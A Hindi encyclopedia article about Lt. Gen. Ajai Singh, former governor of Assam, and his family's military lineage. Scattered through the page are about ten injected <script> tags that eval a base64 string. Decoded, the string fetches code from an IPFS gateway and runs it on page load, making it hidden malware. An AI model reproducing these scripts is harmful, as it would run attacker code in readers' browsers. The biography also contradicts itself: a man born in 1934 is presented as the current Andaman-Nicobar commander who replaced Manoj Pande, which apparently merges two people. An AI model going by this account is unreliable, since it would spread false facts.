अजय सिंह (जनरल)

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
Disamb2.jpg अजय सिंह एक बहुविकल्पी शब्द है अन्य अर्थों के लिए देखें:- अजय सिंह (बहुविकल्पी)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अजय सिंह (जनरल)
अजय सिंह
पूरा नाम लेफ्टिनेंट जनरल अजय सिंह
जन्म 20 नवम्बर, 1934
जन्म भूमि राजस्थान
अभिभावक ब्रिगेडियर- एन.पी. सिंह
नागरिकता भारतीय
पद राज्यपाल, असम- 5 जून 2003 से 4 जुलाई 2008 तक
संबंधित लेख राज्यपाल, भारत के राज्यों के वर्तमान राज्यपालों की सूची, भारतीय सेना
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>अजय सिंह (अंग्रेज़ी: Ajai Singh, जन्म- 20 नवम्बर, 1934) अंडमान-निकोबार के कमांडर इन चीफ (सीएनसी) हैं। कारगिल युद्ध से लेकर सियाचिन ऑपरेशन जैसे कई मिशनों पर वह जांबाजी दिखा चुके हैं। अजय सिंह उस परिवार से ताल्लुक रखते हैं, जिसका सेना से रिश्ता 162 साल पुराना है। इनमें सेना के प्रति जुनून परदादा के पिता के समय से ही है। अजय सिंह 5 जून 2003 से 4 जुलाई 2008 तक असम के राज्यपाल भी रहे।

परिचय

अंडमान और निकोबार द्वीप के सीएनसी अजय सिंह का मध्य प्रदेश से खास रिश्ता है। उनके पद संभालते ही प्रदेश के नरसिंहपुर, जबलपुर व होशंगाबाद जिलों से बधाईयां आने लगी थीं। दरअसल, अजय सिंह म.प्र. के पूर्व वित्तमंत्री कर्नल अजय नारायण मुश्रान के दामाद और सांसद विवेक तन्खा के साढ़ू हैं। लेफ्टिनेंट अजय सिंह फिलहाल सेना मुख्यालय में डीजी, मिलिट्री ट्रेनिंग के पद पर तैनात थे। उन्होंने अंडमान निकोबार कमान के कमांडर इन चीफ, लेफ्टिनेंट जनरल मनोज पांडे की जगह ली है।

सेना से नाता

अजय सिंह के परिवार का सेना से नाता 162 साल पुराना है। अजय सिंह के परदादा के पिता मलूक सिंह अहलावत 1858 में ब्रिटिश सेना की बंगाल कैवलरी (स्किनरहॉर्स) में शामिल थे। इनके परदादा रिसालदार मेजर राज सिंह अहलावत 1901 में ब्रिटिश सेना की स्किनरहॉर्स रेजीमेंट में शामिल हुए। तीसरे अफगान युद्ध में हिस्सा लिया।[1]

दादा, ब्रिगेडियर (कर्नल) कदम सिंह अहलावत 1936 में सेना की पूना हॉर्स रेजीमेंट में शामिल हुए। 1962 के युद्ध में पूर्वी लद्दाख में तैनाती के समय एकलेमेटाइज किए बगैर वे दौलतबेग ओल्डी (डीओबी) पहुंच गए थे। उन्हें वहां हार्ट-अटैक आ गया था। इस वजह से उनका डिमोशन भी हुआ। पिता ब्रिगेडियर एनपी सिंह ने 1973 में 81 आर्मर्ड रेजीमेंट की स्थापना की थी। उस वक्त इस रेजीमेंट को 'डेक्कन हॉर्स' कहा जाता था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. जानिए अंडमान-निकोबार के सीएनसी अजय आखिर हैं कौन (हिंदी) hindi.news18.com। अभिगमन तिथि: 31 जुलाई, 2021।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>